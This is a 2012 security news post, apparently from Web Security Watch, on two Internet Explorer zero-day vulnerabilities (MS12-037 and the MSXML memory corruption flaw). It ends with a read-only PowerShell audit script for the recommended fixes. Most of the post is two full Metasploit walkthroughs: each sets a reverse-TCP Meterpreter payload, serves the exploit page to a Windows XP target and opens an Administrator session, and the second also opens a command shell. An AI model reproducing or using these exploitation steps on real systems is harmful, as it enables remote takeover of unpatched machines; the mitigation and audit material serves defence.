A 0-day vulnerability in Microsoft Internet Explorer is reportedly being used in the wild to hijack Gmail accounts. There is already a Metasploit module for the MSXML Uninitialized Memory Corruption vulnerability. As a workaround, users should disable the vulnerable component. Rapid7 also released another module for MS12-037; users should apply the MS patch to fix the vulnerability.
Less than a week after Microsoft issued Security Advisory 2719615 and the Cumulative Security Update for Internet Explorer, MS12-037, Rapid7 released two Metasploit modules for the vulnerabilities.
A day later, they updated msxml_get_definition_code_exec, and the exploit now works against all versions of Internet Explorer on Windows XP, Vista and Windows 7 (SP1).
Reportedly, the MSXML Uninitialized Memory Corruption vulnerability is actively being used in the wild to hijack Gmail accounts.
Currently, there is no patch for this vulnerability. As a workaround, Microsoft suggests disabling the vulnerable component.
As for MS12-037, users should apply the Microsoft update to fix the vulnerability.
We at websecuritywatch.com tried the two Metasploit modules, and they work like a charm.
Here is how the module for MS12-037 works against a Windows XP (SP3) system:
msf > use exploit/windows/browser/ms12_037_same_id
msf exploit(ms12_037_same_id) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms12_037_same_id) > set lhost 192.168.1.11
lhost => 192.168.1.11
msf exploit(ms12_037_same_id) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   IE 8 on Windows XP SP3 with msvcrt ROP
   2   IE 8 on Windows XP SP3 with JRE ROP
   3   IE 8 on Windows 7 SP1/Vista SP2 with JRE ROP

msf exploit(ms12_037_same_id) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.11:4444
[*] Using URL: http://0.0.0.0:8080/AzHa10iWMjV1J6
[*]  Local IP: 192.168.1.11:8080/AzHa10iWMjV1J6
[*] Server started.
msf exploit(ms12_037_same_id) > [*] 192.168.1.100 ms12_037_same_id - Client requesting: /AzHa10iWMjV1J6
[*] 192.168.1.100 ms12_037_same_id - Using msvcrt ROP
[*] 192.168.1.100 ms12_037_same_id - Sending html
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.100:7657) at 2012-06-20 09:55:57 +0300
[*] Session ID 1 (192.168.1.11:4444 -> 192.168.1.100:7657) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (1956)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 912
[+] Successfully migrated to process

msf exploit(ms12_037_same_id) > sessions

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  1   meterpreter x86/win32  TRACEWIN\Administrator @ TRACEWIN  192.168.1.11:4444 -> 192.168.1.100:7657 (10.0.2.15)

msf exploit(ms12_037_same_id) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : TRACEWIN
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter >
Fortunately, once you apply the security update, this no longer works.
The vulnerability in Microsoft XML Core Services, on the other hand, is still unpatched, and it can be exploited just as easily:
msf > use exploit/windows/browser/msxml_get_definition_code_exec
msf exploit(msxml_get_definition_code_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(msxml_get_definition_code_exec) > set lhost 192.168.1.11
lhost => 192.168.1.11
msf exploit(msxml_get_definition_code_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   IE 6 on Windows XP SP3
   2   IE 7 on Windows XP SP3
   3   IE 8 on Windows XP SP3
   4   IE 8 with Java 6 on Windows XP SP3
   5   IE 8 with Java 6 on Windows 7 SP1/Vista SP2

msf exploit(msxml_get_definition_code_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.11:4444
[*] Using URL: http://0.0.0.0:8080/hxBnxL
[*]  Local IP: http://192.168.1.11:8080/hxBnxL
[*] Server started.

[*] 192.168.1.100 msxml_get_definition_code_exec - Using msvcrt ROP
[*] 192.168.1.100 msxml_get_definition_code_exec - 192.168.1.100:47431 - Sending html
[*] Sending stage (752128 bytes) to 192.168.1.100
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.100:18471) at 2012-06-20 10:34:09 +0300
[*] Session ID 1 (192.168.1.11:4444 -> 192.168.1.100:18471) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (2020)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1852

msf exploit(msxml_get_definition_code_exec) > sessions

Active sessions
===============

  Id  Type                   Information                        Connection
  --  ----                   -----------                        ----------
  1   meterpreter x86/win32  TRACEWIN\Administrator @ TRACEWIN  192.168.1.11:4444 -> 192.168.1.100:18471 (10.0.2.15)

[+] Successfully migrated to process
msf exploit(msxml_get_definition_code_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : TRACEWIN
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Meterpreter     : x86/win32
meterpreter > shell
Process 380 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator\Desktop>exit
meterpreter >
Remember, although there is no patch for this vulnerability yet, you can follow Microsoft's recommendations on how to mitigate it.
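To turn the two pieces of advice in this post (apply MS12-037; keep the MSXML controls from running in Internet Explorer until a patch ships) into something you can check across a fleet, here is an added PowerShell audit example; it is not code from Web Security Watch, Rapid7 or Microsoft. It assumes only the Microsoft-documented ActiveX "kill bit" (the Compatibility Flags value 0x400 under the ActiveX Compatibility registry key, which also has to be present under Wow6432Node on 64-bit Windows) and Get-HotFix; the KB number and the MSXML CLSIDs are left as placeholders to fill in from MS12-037 and Advisory 2719615, and the function names Get-IeExposureReport, Test-ActiveXKillBit and Test-HotFixInstalled are invented for this example.

```powershell
# Added example (not the post's, Rapid7's or Microsoft's code): a read-only audit
# of a Windows host for the two defensive states the post recommends.
#   1. The MS12-037 cumulative IE update is installed (checked via Get-HotFix).
#   2. The MSXML ActiveX controls are disabled in Internet Explorer, i.e. the
#      documented kill bit (Compatibility Flags 0x400) is set for their CLSIDs,
#      which is the effect of the Advisory 2719615 workaround.
# The KB number and CLSID list are PLACEHOLDERS: take the real values from
# Microsoft Security Bulletin MS12-037 and Security Advisory 2719615.

$Ms12037Kb   = 'KB0000000'                                  # placeholder, see MS12-037
$MsxmlClsids = @('{00000000-0000-0000-0000-000000000000}')  # placeholders, see 2719615
$KillBitFlag = 0x400                                        # documented ActiveX kill bit

# 32-bit IE on 64-bit Windows reads the Wow6432Node copy, so every view that
# exists on the box must carry the bit for the control to be truly disabled.
$KillBitRoots = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Test-ActiveXKillBit {
    # True only if the kill bit is set for $Clsid in every existing registry view.
    param([Parameter(Mandatory)][string]$Clsid)
    $roots = @($KillBitRoots | Where-Object { Test-Path $_ })
    if ($roots.Count -eq 0) { return $false }
    foreach ($root in $roots) {
        $key = Join-Path -Path $root -ChildPath $Clsid
        if (-not (Test-Path $key)) { return $false }
        $flags = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -eq $flags) { return $false }
        if (($flags -band $KillBitFlag) -ne $KillBitFlag) { return $false }
    }
    return $true
}

function Test-HotFixInstalled {
    # Get-HotFix reads Win32_QuickFixEngineering; absence there means "not installed".
    param([Parameter(Mandatory)][string]$Kb)
    return [bool](Get-HotFix -Id $Kb -ErrorAction SilentlyContinue)
}

function Get-IeExposureReport {
    [pscustomobject]@{
        Ms12037Installed = Test-HotFixInstalled -Kb $Ms12037Kb
        MsxmlKillBits    = @(foreach ($c in $MsxmlClsids) {
            [pscustomobject]@{ Clsid = $c; KillBitSet = Test-ActiveXKillBit -Clsid $c }
        })
    }
}

# Usage: run elevated on the host to audit and act on the warnings.
$report = Get-IeExposureReport
$report | Format-List
if (-not $report.Ms12037Installed) {
    Write-Warning 'MS12-037 is not installed: apply the Microsoft update.'
}
$report.MsxmlKillBits | Where-Object { -not $_.KillBitSet } | ForEach-Object {
    Write-Warning "MSXML control $($_.Clsid) can still run in IE: apply the Advisory 2719615 workaround."
}
```

The script only reads the registry and the hotfix list, so it is safe to push through a management tool as a compliance check; flipping the kill bit itself should go through the Microsoft Fix it or the advisory's registry steps, and it stops the MSXML controls for every site, not just hostile ones, which is the trade-off the workaround asks you to accept until the patch arrives.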
External References:
- Rapid7 Blog
- CVE-2012-1889
- CVE-2012-1875
- Microsoft Security Advisory (2719615)
- Microsoft Security Bulletin MS12-037
- MSXML: Fix it before fixing it
The post 0-Day Vulnerabilities in Microsoft Internet Explorer appeared first on Web Security Watch.